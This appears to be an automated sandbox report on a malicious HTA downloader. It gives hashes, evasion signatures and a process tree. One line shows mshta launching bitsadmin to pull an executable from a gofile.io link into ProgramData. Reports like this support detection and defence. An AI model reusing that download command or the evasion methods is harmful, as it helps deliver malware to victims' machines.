Analysis

  • max time kernel
    436s
  • max time network
    438s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-08-2024 07:33

General

  • Target

    Downloader.hta

  • Size

    839B

  • MD5

    c8d31f50c426babbe89f9e683cf2c811

  • SHA1

    f707753871857aec319cf41b8f3f9739e29e9b11

  • SHA256

    ef8789feee0030d961135116b75790b99bd914de5467671023dec1cafcb0ca1e

  • SHA512

    e1f459921a084ba9f2f8d2c78666f303a1193c8dda06bb245c1587d93af1ea86af3cc79f0fc813bc4cbfebaf4af6e8073c2fbd2bbf53bc83ecbd3c9b4fe5b5cd

Score
8/10

Malware Config

Signatures

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3296
    • C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://gofile.io/d/G6Wixe C:\ProgramData\XClient.exe
      2⤵
      • Download via BitsAdmin
      • System Location Discovery: System Language Discovery
      PID:4784
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:4856
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:3816

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

    Filesize

    64KB

    MD5

    d2fb266b97caff2086bf0fa74eddb6b2

    SHA1

    2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

    SHA256

    b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

    SHA512

    c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

  • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

    Filesize

    4B

    MD5

    f49655f856acb8884cc0ace29216f511

    SHA1

    cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

    SHA256

    7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

    SHA512

    599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

  • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

    Filesize

    944B

    MD5

    6bd369f7c74a28194c991ed1404da30f

    SHA1

    0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

    SHA256

    878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

    SHA512

    8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

  • C:\Users\Admin\Desktop\AssertReceive.svgz

    Filesize

    544KB

    MD5

    57bbe8f2a84b0af27b664561c704a5f5

    SHA1

    5e69a282fc0faa72133b2fa210922b15c91a3d3d

    SHA256

    f4196af133eb20259d992c006b213869f01270edd6b0689f9a1df8ae784f1a00

    SHA512

    5c8bfbb0422ce2e85dd4b798cc5aa98f2756a1d9ed2e6c38bdf7611cea265b59b081edfba09ed070555b7d118d405b39469161b25980f27e52b5d0b4e67bdca6

  • C:\Users\Admin\Desktop\BackupBlock.mpeg

    Filesize

    755KB

    MD5

    31a961554550bc20d98f8d4bc2a2eb4a

    SHA1

    c54ba0d45613f6a9d2dd965911aec209ae81d84c

    SHA256

    b6c3592eb02c4442edec479e0a69ccf510d9bf3447935e0aa212e70dfd305a37

    SHA512

    8d4c4bf5ca8dd577efcb9b3a87cfaf46dc47b8da85960ab4f00c82c7701a0f3df9232d0e816e76e60d465770409e3390988162682588586fbb57ed45b3364824

  • C:\Users\Admin\Desktop\CheckpointStart.xlsm

    Filesize

    967KB

    MD5

    7cf25f0c59a7d5762308c96fbd450f8f

    SHA1

    654aab086e03a0d679b9b3c12042cbf600b87da5

    SHA256

    b5dd655700966ccfba7bec45853555096288272631e22d303678e1eba3300164

    SHA512

    d1b92dd6905923f6b21ab2506675fff794fd326f2dca30d45eefec0065d8a9e4d085af95ce87923686017a5349c76be304948d762b256905c90bda6b20d45e7c

  • C:\Users\Admin\Desktop\ConnectCheckpoint.fon

    Filesize

    453KB

    MD5

    3364bd77392aeb28314998c46b03291d

    SHA1

    9dbe19ca0ceef47e87b28abf3103fb074bb03f2f

    SHA256

    ad2ef332410d0a389473a94be70b1c5637a9af7695a7d6e33de89455a5d6db57

    SHA512

    d837be3fc459417530912da25f581364c105fbe42b8928fc1b3f7a39b86e352aba88b24d8fa4d404bb5cfd7517d1213cc44910d2f3fc5d16df6b1afdd5b8a108

  • C:\Users\Admin\Desktop\ConnectFormat.xlt

    Filesize

    936KB

    MD5

    b0191b2d7cef4844ae7b4c1a5544b8a1

    SHA1

    df4000ed8ecd641a03d6da4096746d7acb0e241c

    SHA256

    4b80b7f7aa032b991524bd61679429fc6ca45df98e0079af82f24b16723f9ec0

    SHA512

    f985b913d60753f47ccbba801290c6753c031cc6f3203d866d0ec29ce8e5412b150c8aa8f270c323d5aaa0472b6533d61805f75b34a3d0ee5334c6d4127b336a

  • C:\Users\Admin\Desktop\CopyMount.mpeg2

    Filesize

    846KB

    MD5

    a24cc5e62521870e7c38d9e80f9a2f29

    SHA1

    6e7e428d486eb7340937ef453452286279af3c27

    SHA256

    7d58dc4b0dbfd40d8e395f46f99045f34f521efab7b86941a889d621b9b8600d

    SHA512

    9cf0f03247b94f78fc16e1c6d2e930b6df2c155a3477733c587f8d888055c361fe6bda980a21cf8354412c09a5a1fc3cdee0992c5184ccd31f8252e894a41911

  • C:\Users\Admin\Desktop\ExportEnable.mpp

    Filesize

    604KB

    MD5

    fb1d0702d40ff962c7b16168dd6a07bc

    SHA1

    266bbcafa5d7fab64657b7f4c1c10ad3a2548a5b

    SHA256

    d47b1bf9bf1383f9deb010b0fdebd6e27a552c12751e5705865e69241b32c657

    SHA512

    17884689cd3b86e8190ddfe0e683a5f50287f8ff98da24b0f4edf3addd5b902957d3df13dc44714c5782506c7b3ccdb3557c096c971ab574bedbbe686f222796

  • C:\Users\Admin\Desktop\InitializeRename.mp3

    Filesize

    785KB

    MD5

    0fc1944f7f3a6105682e064e034b57dd

    SHA1

    274e92505f3b738f7a889c2a6f2afc50065ba765

    SHA256

    6ac937803105e4fc99ae6503b9219023bc62682e4461bde0d271d5b9950be66a

    SHA512

    b80259905850a4c5ffd3420ff4e2abae411089051506c65d1abd689131b5429f8a46033e75ddd87f797a688ecda9f311eb7141f7b13330fc5f53d3f4693d1451

  • C:\Users\Admin\Desktop\InvokeAssert.zip

    Filesize

    664KB

    MD5

    3413700e5c085d38c9c397e1b05b6ac5

    SHA1

    7f4113b5f63afbbe0f092ba0bb2c5f64733c370d

    SHA256

    6482a724de2e83cc45d250273203f29fe4a30a563572cfac1696b1647133679c

    SHA512

    b96263f521ffb05b769add1c486b5d301bd6295e091c415bb17769380514e700e3d46f45116af8223f25258fdddd88ed1cdfcaa60de11a8d701010ffb9fd049c

  • C:\Users\Admin\Desktop\LockRestore.jpg

    Filesize

    906KB

    MD5

    bbef9477bb378e2244eeab7e47779447

    SHA1

    a590dfd26a8f9f0f9bee079231b9e108cd646c1e

    SHA256

    6b777ec658803c6430d37109eff95d37e96bc3674251bb0e56011760302716af

    SHA512

    8ec52f0ed2c6e28dbe1403e3bd61569f809b5f452b160132f2c2da6299eb6c0ce1bfe905c64349991e26d35487605c18730e7ef935f69d05d0a51e08db1496d5

  • C:\Users\Admin\Desktop\MeasureCheckpoint.ico

    Filesize

    725KB

    MD5

    23114327ef8a993a9cd6ed124d64f1d4

    SHA1

    86fcf88e115b435f61de3661517bee9d8fa48d6d

    SHA256

    60ef38c99c289a6567c07fa91a18c9bc96d339c2899300eb6b393cdf65d4f071

    SHA512

    972561e0fd3cfb304867ac5dd964092c5b91af47bdf0c99e0d269dea96c612d9a736cc3e7bbce043074cb73c552e3a51beb4882c6590ec07d7ba32886ba2e10d

  • C:\Users\Admin\Desktop\MergeCopy.otf

    Filesize

    695KB

    MD5

    053dba12b4871ee25090cd330e4fb860

    SHA1

    2d75ecf39d9f1fc04c30556f77ac91609fdadaaf

    SHA256

    7fcad3c9a9d66f09e8ff310658c3434050c5a9c9a7fabc5bf8981ce5f93f685a

    SHA512

    cf7b7ab0ec26e2a06aee0a0ba6a47f434e8b9b4c40964ce3c0b1161a32717dfd1a88270b310742e23499073b54844b58043d7a09f09b71247aa4f2f5f9805821

  • C:\Users\Admin\Desktop\Microsoft Edge.lnk

    Filesize

    2KB

    MD5

    7deb1c5ca7b35696ce4dff97b5bbf1c6

    SHA1

    6ed83ea50a26071d4d1e52608935d5d04892e8c1

    SHA256

    7151dc306e0ded55c326d2ca1e86f7097ec665a49ab61fcb8d16fc66db8fcc3d

    SHA512

    cf385c2c59ecba2e9d7c6484ad941728c91e1a3963612f8374e41d9bb17622945c49e4981b683227dafd388f5d69daaf892e3b7ef4157c0ec7a4b818b91880ae

  • C:\Users\Admin\Desktop\MoveLock.au

    Filesize

    483KB

    MD5

    869b921da3b35dfdc8be3f925125fd8c

    SHA1

    27ad0f1fe480a8f8c4dbcb8515a5248fb7f5255a

    SHA256

    2dabeded46918a45a40905eb3af723ec1abcaaa742a168b5a3c8098bd74f2edb

    SHA512

    2f1b00e7c892d5777e58dc713574835541e01d1ec6a771964660a99c0d247d2bf66199105a1bc91cffac32cf32d01834e44cc8691090f9de5504af7b5ca82a50

  • C:\Users\Admin\Desktop\OpenPop.xht

    Filesize

    513KB

    MD5

    6e4f1bd7a03f9f6f4a56459b9ee0a8cf

    SHA1

    31f4b269b221d5ff6557b0289a3c6c41f5110210

    SHA256

    79307b5fb6fc89dcdd1fd65e960398e764b4eb6aaf0c0190615dfe43a7c99463

    SHA512

    03d13b4296b47d4e3c0fcf984f8af2e0b8b4c8b954f4b419766385408311e1cc7a2066bcfc808bfecb3755919b56147525c36bfe41abae5e508f1b89b0efad5a

  • C:\Users\Admin\Desktop\PingEnable.avi

    Filesize

    816KB

    MD5

    1ff53171f76bfce6a7664fd789db639b

    SHA1

    33adcaf96039b929a196bd9eb21489c95663da5e

    SHA256

    610ec195d3419d7cf235a87eeca086fb953d90bfb91995c56fff5b2fa46ff47b

    SHA512

    510cdb0957a3a9a6c929dedec194e4ad47c725a40854f4303e88e62701bedd4dd60965f18e981f91d8483e241a5cabe379f3f505cf47e8d45caac27b24be8bba

  • C:\Users\Admin\Desktop\PublishApprove.mpe

    Filesize

    997KB

    MD5

    9154cfde9cc004bea75f38ac5185448a

    SHA1

    17fedbd4f298c68f5a941249ddf05a40a3c955cc

    SHA256

    196f09d684a985dbcdacc883a4916a4d909c7f5f66265190de948afd5acc188d

    SHA512

    13fe5443db643b027d4eca5596b4165b80e8ad8bd19cb2534a39c7a51f0978b30bed2399f8815e2dc6de73f2840c456805c924ab5eaf44d42cd22c492fa8f75d

  • C:\Users\Admin\Desktop\PublishRestore.xhtml

    Filesize

    1.4MB

    MD5

    2cfe3191919b6e2d5b1b1f4e6ebf3495

    SHA1

    a98d3a6fc91a28096694c093f14b4baf9ad3ba47

    SHA256

    b9833241cd68bdb9d51b351bd7ab42dae89db1425a34fd6ba6553eff70d5abd4

    SHA512

    de2e49e5f0c1ad44c06aff41b1a6c23fa03385e364f02569e051c20a1149227c5b936ee99e6b23a07e85ab67c1faf55647e4fd187e78027fc7b8be0936a63858

  • C:\Users\Admin\Desktop\ReadExit.hta

    Filesize

    392KB

    MD5

    29553d5a7ceef758ec9060430b4b0361

    SHA1

    509f59067d571fbf863eb6ccf6cfa89b0939fca4

    SHA256

    3866a1665b992bba5edd9dd5dae5e3140b84337a044101f18480b4783fa16c68

    SHA512

    7974166ae431d92276b995aea86405bcd5d1d9f4529d738f231da1829c9a3d4b1ac2f1de9a4a377055a4a9baf05e85b45a654e54a70e4bc86b7e8996ed8b5322

  • C:\Users\Admin\Desktop\RedoFind.xml

    Filesize

    362KB

    MD5

    ab03eee998a114f5ffb93a85f58dc6cc

    SHA1

    79e34ad28f3ac1020f27171e265ca55ee9072fa0

    SHA256

    afd5380c81b51f9d702cf78f7ed481b47dd6ec9c8e0da1ccc87e69c10658764d

    SHA512

    14adf82576881861585ce9dab6be6c413ae530f9122b51fdb2139c29953b6463e55b8249e1c9de50f339c08f89cf742d1a03c9c3f66945a931e4edbd5dbbd836

  • C:\Users\Admin\Desktop\RenameLock.bmp

    Filesize

    876KB

    MD5

    55869ca111b70a9a1a131a9313a329c6

    SHA1

    6e0b234551baaa25e627a729b166ec32102bee1f

    SHA256

    068ec3b044c25c83240d62a2f39b70c7956bbcea7f30d560830e3aafcc54449d

    SHA512

    732064f8ac16b90e0155aa6b4765e5e6c813733192182ecbc8cacb41734982924f8abe862a4a882725f2eac4aa162ccdd485d9af96bce5bf48edc60db905df93

  • C:\Users\Admin\Desktop\RevokeSend.html

    Filesize

    634KB

    MD5

    e6fa18e12e26d2b050465d26a7bc120d

    SHA1

    570a651c4efb13d51a6cacb1c35022bead84d16a

    SHA256

    5d81dba4b3d860c0354191f673d4a0f6aa3fe50b2fcf2ce811a38a7ed55f4934

    SHA512

    ebe0881ce15de964ab317d08c489d8093a6e2b068a18515706864f96831a856c46ab68330b31bdd95431e6e34f4808b9ac055363002e58398d1dd2e6191c24f7

  • C:\Users\Admin\Desktop\SelectUndo.htm

    Filesize

    1.0MB

    MD5

    c39141171f51cf1b73ed5c6889c9c9d6

    SHA1

    8f5e7d89e86927bbb057606810e29c2c5c5a8f90

    SHA256

    c2aabc75edbe7b93ca8941ef1dce07472367053cc198deb406bff57dddba4de7

    SHA512

    5f7322bbafcae996011a10e0188cb4a18a012f611f762f5ef5a97a12f75d9030b4ff66a1c4db1af18a5bad44db368ec4ac74cc8129895bbfb1457e330e265b2c

  • C:\Users\Admin\Desktop\SendMove.potm

    Filesize

    574KB

    MD5

    690b6d9b156632bee7650f19d3251c0a

    SHA1

    2611e3a72c4402a7f7641fd9fdd06a64491d706f

    SHA256

    96b91a05863c88ba0ad2ed9fb69f2fce5313eda50094d52bfd27b4cd78d8e441

    SHA512

    19ddfea8f2e7c92188675c1f7cd771b73c784b106f6d01a54db041a90a52adb20d7c37897504f694b9185b55992acad7f183d0a082d2a83fe81142cd997d546e

  • C:\Users\Admin\Desktop\StepMerge.docx

    Filesize

    18KB

    MD5

    77e2ad97e17d175237573de11920dd17

    SHA1

    40a9eb49ccbe64c5d3231c465871bfbd2531c89d

    SHA256

    e3d39f004cbc6c8869d68c5ccef3a1904315553d1bf3b6565804989850babdb3

    SHA512

    3fce3beb4277ecd407f93d882c5349469d340574a30cb348efce6f78726bfc90998b5c54f1041d8a3ade299c03493a47301dd12f113c76643b1b3bb55c5301f8

  • C:\Users\Admin\Desktop\UnprotectDismount.fon

    Filesize

    423KB

    MD5

    2ca871b517a85333e5383d914ac4c48a

    SHA1

    8481c730ad9e50bb51abeb4555902760841ae1a4

    SHA256

    9d417d8bd6835e8882dcbbb78f762554124f480b68285a9e7065e66344875022

    SHA512

    298b8ca23a54aaa96275293dba5f0f5e0bd16f1befb03065abbf728493aed9cf80b6584dfa4e61071f5c502eab35dc173b9d13ee73550969844907ff81ec0cb6

  • C:\Users\Public\Desktop\Acrobat Reader DC.lnk

    Filesize

    2KB

    MD5

    d430547f4c6d64c4f36053f42de1b4d0

    SHA1

    9e92d41693a134f3ac4fb06f7aba663c8c856115

    SHA256

    10b0351332b326d17b516202e0a5bdf2f793377db77c373547b1eb564942cee4

    SHA512

    ac3db5254d551c1864c1ae411c8d6f87435277e18c1f5642c6b36da013a30087e56f28b66a7b6128de98e5ea0f87a57f5fd9061c545a8beb85658db85819b6da

  • C:\Users\Public\Desktop\Firefox.lnk

    Filesize

    1000B

    MD5

    b5b1db65ee4b5444f47f3ba856ba3a2c

    SHA1

    e26f2a2d3ce5c951d6540977e25eec2fc644b808

    SHA256

    7cf618a1e89f30170449a33a2ad7c8063970c71548beda7c31a808582cb8bce0

    SHA512

    27cee9c30552a6db9ce35d37e7207af7fdf1ef4db62bf2de712974976d3af8d8d0c1c2cd4624cb238daa4e26eb07147eb653a618630b9fa1daecba95d18c9607

  • C:\Users\Public\Desktop\Google Chrome.lnk

    Filesize

    2KB

    MD5

    506b5c060574b432deecfd9b8ce43ef5

    SHA1

    364f5adb90065d1df1c84c088e3248f8bd166dd9

    SHA256

    e41ff00c3bb1a2cfe3d73e11e9ef290fc69fb243bd0f6f34c4d337d98784a16f

    SHA512

    eede8f95a5ceb64ff58b5ebe314d8e80a8b291cb2e2ad51b080abf39a0163a9f19518d071095da50e0ad2e5c6df85b6d491a3d574132deb646ae40a07020699a

  • C:\Users\Public\Desktop\VLC media player.lnk

    Filesize

    923B

    MD5

    d90d015c1ee2f3ce05a221185a209f92

    SHA1

    13bf0ab97b52e901b3573dcea67f0be856f5f49d

    SHA256

    66261ef5bff2722cdafecdb7b705c22ace1bd18bd9c515bea4f9e177ccfe431b

    SHA512

    e854bbd237b8ba92150db6c4ab8cfdb0e48a42264d73a73c1f1dbd3cd7f988d3c493d2cde94f9b52cbfaad0b8d2acbee6baae457776c68831095ea3923e1ccb1

  • memory/3816-45-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp

    Filesize

    4KB

  • memory/3816-51-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp

    Filesize

    4KB

  • memory/3816-52-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp

    Filesize

    4KB

  • memory/3816-53-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp

    Filesize

    4KB

  • memory/3816-54-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp

    Filesize

    4KB

  • memory/3816-55-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp

    Filesize

    4KB

  • memory/3816-56-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp

    Filesize

    4KB

  • memory/3816-46-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp

    Filesize

    4KB

  • memory/3816-44-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp

    Filesize

    4KB

  • memory/4856-7-0x000001345E940000-0x000001345E941000-memory.dmp

    Filesize

    4KB

  • memory/4856-13-0x000001345E940000-0x000001345E941000-memory.dmp

    Filesize

    4KB

  • memory/4856-2-0x000001345E940000-0x000001345E941000-memory.dmp

    Filesize

    4KB

  • memory/4856-3-0x000001345E940000-0x000001345E941000-memory.dmp

    Filesize

    4KB

  • memory/4856-8-0x000001345E940000-0x000001345E941000-memory.dmp

    Filesize

    4KB

  • memory/4856-12-0x000001345E940000-0x000001345E941000-memory.dmp

    Filesize

    4KB

  • memory/4856-1-0x000001345E940000-0x000001345E941000-memory.dmp

    Filesize

    4KB

  • memory/4856-11-0x000001345E940000-0x000001345E941000-memory.dmp

    Filesize

    4KB

  • memory/4856-10-0x000001345E940000-0x000001345E941000-memory.dmp

    Filesize

    4KB

  • memory/4856-9-0x000001345E940000-0x000001345E941000-memory.dmp

    Filesize

    4KB